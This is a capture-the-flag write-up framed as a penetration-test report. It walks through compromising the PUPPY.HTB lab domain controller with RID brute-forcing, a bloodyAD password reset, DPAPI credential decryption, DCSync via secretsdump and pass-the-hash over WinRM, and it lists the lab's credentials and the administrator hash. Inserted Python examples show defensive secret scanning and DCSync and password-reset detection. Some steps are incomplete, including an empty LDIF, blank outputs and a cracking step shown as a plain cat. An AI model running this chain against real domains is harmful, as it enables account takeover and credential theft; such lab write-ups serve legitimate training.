# Penetration Testing Report for PUPPY.HTB (10.10.11.70)
## Executive Summary
This report details a penetration test conducted on the target machine at 10.10.11.70, part of the PUPPY.HTB Active Directory domain, from May 22–26, 2025. Using tools such as RustMap, NetExec, BloodHound, keepass4brute, and dpapi.py, the test achieved full administrative access through reconnaissance, credential exploitation, privilege escalation, and a DCSync attack. Key vulnerabilities included weak permissions, unprotected backup files, and an insecure KeePass database.
---
## 1. Initial Reconnaissance
### 1.1 RustMap Scan
A network scan was performed using RustMap (https://github.com/Wael-Rd/RustMap) on May 22, 2025, at 21:56 CEST, combining RustScan for port discovery and Nmap for service enumeration.
Command:
```bash
RustMap 10.10.11.70
```
Key Findings:
- **Target**: 10.10.11.70
- **Open Ports**: 53 (DNS), 88 (Kerberos), 111 (rpcbind), 135 (MSRPC), 139 (NetBIOS-SSN), 389 (LDAP), 445 (SMB), 464 (kpasswd5), 593 (HTTP-RPC), 2049 (NFS), 9389 (ADWS), 49664, 49667, 49669, 49670, 49685 (MSRPC).
- **Filtered Ports**: 3, 9, 10, 11, 22, 56, 70, 636, 2025, 49685.
- **Services**:
  - DNS: Simple DNS Plus (port 53).
  - Kerberos: Microsoft Windows Kerberos (port 88).
  - LDAP: Microsoft Windows Active Directory LDAP (port 389, Domain: PUPPY.HTB, Site: Default-First-Site-Name).
  - SMB: Microsoft Windows SMB (ports 139, 445).
  - NFS: Network File System (port 2049).
  - ADWS: Active Directory Web Services (port 9389).
  - RPC: Multiple RPC services (ports 49664–49685).
- **OS**: Likely Microsoft Windows Server 2022 (86% confidence).
- **Host Info**: Hostname: DC, Domain: PUPPY.HTB.
---
## 2. Initial Access
### 2.1 Provided Credentials
Initial access was facilitated using:
- **Username**: levi.james
- **Password**: KingofAkron2025!
An entry mapping PUPPY.HTB to 10.10.11.70 was added to /etc/hosts for local name resolution.
### 2.2 User Enumeration
Active Directory users were enumerated using NetExec with a RID brute-force attack:
Command:
```bash
nxc smb PUPPY.HTB -u 'levi.james' -p 'KingofAkron2025!' --rid-brute | grep "SidTypeUser" | awk -F '\\' '{print $2}' | awk '{print $1}' > users.txt
```
Result: A list of domain users was saved to users.txt.
### 2.3 Share Enumeration
SMB shares were enumerated to identify accessible resources:
Command:
```bash
crackmapexec smb 10.10.11.70 -u levi.james -p 'KingofAkron2025!' --shares
```
Result: Identified a share named DEV, indicating access to development resources.
### 2.4 KeePass Database Cracking
A KeePass database (recovery.kdbx) was retrieved from the DEV SMB share and cracked using the keepass4brute script:
Command:
```bash
cat kdb_recovery.txt
```
Result: The credentials for ant.edwards (Antman2025!) were used for further enumeration.
---
## 3. Active Directory Enumeration
### 3.1 BloodHound Analysis
bloodhound-python was used to map Active Directory relationships and privileges:
Command:
```bash
bloodhound-python -dc DC.PUPPY.HTB -u 'levi.james' -p 'KingofAkron2025!' -d PUPPY.HTB -c All -o bloodhound_results.json -ns 10.10.11.70
```
Findings:
- levi.james is a member of the Developers group with GenericWrite permissions on another account (not immediately exploitable).
- A password spraying attack using passwords_only.txt confirmed the ant.edwards credentials (Antman2025!) from the KeePass database.
### 3.2 Privilege Analysis
The ant.edwards account had write privileges on adam.d.silver:
Command:
```bash
bloodyAD --host 10.10.11.70 -d PUPPY.HTB -u ant.edwards -p 'Antman2025!' get writable --detail | grep -E "distinguishedName: CN=.*DC=PUPPY,DC=HTB" -A 10
```
Result: Confirmed ant.edwards could modify adam.d.silver's attributes.
---
## 4. Password Reset and Access Escalation
### 4.1 Password Reset
The password for adam.d.silver was changed to SecurePass2025! using bloodyAD:
Command:
```bash
bloodyAD --host 10.10.11.70 -d PUPPY.HTB -u ant.edwards -p 'Antman2025!' set password 'CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB' SecurePass2025!
```
Result:
```text
[+] Password changed successfully!
```
### 4.2 Account Reactivation
If adam.d.silver was disabled, it was reactivated using an LDIF file:
LDIF Content:
```ldif
dn: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
```
Command:
```bash
ldapmodify -x -H ldap://10.10.11.70 -D "ant.edwards@puppy.htb" -w 'Antman2025!' -f modify.ldif
```
### 4.3 Remote Shell
A remote shell was established via WinRM:
Command:
```bash
evil-winrm -i 10.10.11.70 -u adam.d.silver -p 'SecurePass2025!'
```
Result: Successful shell access as adam.d.silver.
---
## 5. Privilege Escalation
### 5.1 Local Enumeration
Using the adam.d.silver shell, the Backups directory revealed site-backup-2024-12-30.zip. Extracting it yielded nms-auth-config.xml.bak, containing:
- **Username**: steph.cooper
- **Password**: ChefSteph2025!
A new WinRM session was established:
Command:
```bash
evil-winrm -i 10.10.11.70 -u steph.cooper -p 'ChefSteph2025!'
```
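The backup in 5.1 was exploitable because a configuration file inside the archive carried a plaintext password. The following added example (not part of the original report) shows the pre-publication check a defender can run over a backup archive before it lands on a share: it walks a zip in memory, parses XML-like members and reports any element or attribute whose name looks like a secret, with the value masked. The archive contents are constructed stand-ins for site-backup-2024-12-30.zip, not the real file.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Names that usually hold a secret; tag and attribute names are matched case-insensitively.
SECRET_NAME = re.compile(r"pass(word|wd)?|pwd|secret|token|api[_-]?key", re.I)


def build_sample_archive():
    """Constructed stand-in for the backup zip; the members and values are invented."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("site/nms-auth-config.xml.bak",
                   '<?xml version="1.0"?><config><auth><username>steph.cooper</username>'
                   '<password>ChefSteph2025!</password></auth></config>')
        z.writestr("site/web.config",
                   '<configuration><appSettings><add key="theme" value="dark"/>'
                   '</appSettings></configuration>')
        z.writestr("site/readme.txt", "plain text, not XML")
    return buf.getvalue()


def mask(value):
    """Keep two leading characters so a finding is recognisable without leaking it."""
    return value[:2] + "*" * (len(value) - 2) if len(value) > 2 else "**"


def find_secrets_in_xml(name, data):
    """Return (member, location, masked value) for secret-looking elements/attributes."""
    findings = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError:          # non-XML members (text, binaries) are skipped
        return findings
    for el in root.iter():
        text = (el.text or "").strip()
        if SECRET_NAME.search(el.tag) and text:
            findings.append((name, el.tag, mask(text)))
        for key, val in el.attrib.items():
            if SECRET_NAME.search(key) and val:
                findings.append((name, "@" + key, mask(val)))
        # ASP.NET style <add key="..." value="..."/> entries
        key, val = el.attrib.get("key", ""), el.attrib.get("value", "")
        if el.tag == "add" and SECRET_NAME.search(key) and val:
            findings.append((name, key, mask(val)))
    return findings


def audit_archive(zip_bytes):
    """Scan every file member of a zip held in memory."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as z:
        for info in z.infolist():
            if not info.is_dir():
                findings.extend(find_secrets_in_xml(info.filename, z.read(info)))
    return findings
```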
### 5.2 DPAPI Credential Extraction
DPAPI-protected files were identified in the steph.cooper profile:
Command:
```powershell
cd C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107
```
Output:
```text
Name Attributes LastWriteTime
```
A credential blob was found:
Command:
```powershell
cd C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials
```
Output:
```text
Name Attributes LastWriteTime
```
File downloads via evil-winrm failed, so a temporary SMB server was used to transfer the files.
### 5.3 DPAPI Decryption
The masterkey 556a2412-1275-4ccf-b721-e6a0b4f90407 was decrypted:
Command:
```bash
dpapi.py masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 -sid S-1-5-21-1487982659-1829050783-2281216199-1107 -password 'ChefSteph2025!'
```
The decrypted masterkey was then used to decrypt the credential blob, which contained:
- **Username**: steph.cooper_adm
- **Password**: FivethChipOnItsWay2025!
---
## 6. Domain Compromise
### 6.1 DCSync Attack
The steph.cooper_adm account had DCSync privileges, allowing extraction of all Active Directory hashes:
Command:
```bash
secretsdump.py 'PUPPY.HTB/steph.cooper_adm:FivethChipOnItsWay2025!@DC.PUPPY.HTB'
```
Result: Obtained the NTLM hash for the administrator account:
```text
bb0edc15e49ceb4120c7bd7e6e65d75b
```
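Two steps in this chain leave distinctive Security log events on the domain controller: the password reset of adam.d.silver by ant.edwards (4.1) is logged as event 4724, and the DCSync by steph.cooper_adm (6.1) is logged as event 4662 carrying the DS-Replication-Get-Changes extended-right GUIDs. The following added example (not part of the original report) runs simple detection logic for both over a few constructed event lines; the allow-lists KNOWN_DCS and PASSWORD_ADMINS are assumptions a real deployment would populate from its own inventory.

```python
import json
import re

# Extended rights a DCSync needs; a 4662 granting any of these to a non-DC account
# is the replication request that secretsdump.py issues.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
KNOWN_DCS = {"DC$"}                 # assumed: machine accounts expected to replicate
PASSWORD_ADMINS = {"Administrator"}  # assumed: staff allowed to reset other users' passwords
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}")

# Constructed event lines (JSON, one event per line); the names match the report.
SAMPLE_EVENTS = [
    '{"EventID": 4662, "SubjectUserName": "DC$", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"}',
    '{"EventID": 4662, "SubjectUserName": "steph.cooper_adm", "Properties": "Control Access '
    '{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}',
    '{"EventID": 4724, "SubjectUserName": "ant.edwards", "TargetUserName": "adam.d.silver"}',
    '{"EventID": 4724, "SubjectUserName": "Administrator", "TargetUserName": "levi.james"}',
    '{"EventID": 4662, "SubjectUserName": "levi.james", "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"}',
]


def analyse_events(lines):
    """Return (rule, subject, detail) alerts for the JSON event lines given."""
    alerts = []
    for line in lines:
        ev = json.loads(line)
        subject = ev["SubjectUserName"]
        if ev["EventID"] == 4662 and subject not in KNOWN_DCS:
            # Properties lists the GUIDs accessed; keep only the replication rights.
            guids = set(GUID_RE.findall(ev.get("Properties", "").lower()))
            rights = sorted(REPLICATION_GUIDS[g] for g in guids & REPLICATION_GUIDS.keys())
            if rights:
                alerts.append(("DCSync", subject, ",".join(rights)))
        elif ev["EventID"] == 4724 and subject not in PASSWORD_ADMINS:
            # A reset of someone else's password by a non-admin: the GenericWrite abuse path.
            alerts.append(("PasswordReset", subject, ev["TargetUserName"]))
    return alerts


if __name__ == "__main__":
    for alert in analyse_events(SAMPLE_EVENTS):
        print(alert)
```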
### 6.2 Administrative Access
A WinRM session was established using the administrator hash:
Command:
```bash
evil-winrm -i 10.10.11.70 -u administrator -H bb0edc15e49ceb4120c7bd7e6e65d75b
```
Result: Full administrative access to the domain.
---
## 7. Conclusion and Recommendations
### 7.1 Summary
The penetration test compromised the PUPPY.HTB domain by:
1. Conducting reconnaissance with RustMap to identify services.
2. Enumerating users and shares with NetExec, retrieving recovery.kdbx from the DEV SMB share.
3. Cracking recovery.kdbx with keepass4brute to obtain ant.edwards credentials.
4. Mapping privileges with BloodHound to identify exploitable permissions.
5. Resetting the adam.d.silver password using bloodyAD.
6. Extracting credentials from backups and DPAPI-protected files.
7. Performing a DCSync attack to retrieve the administrator hash.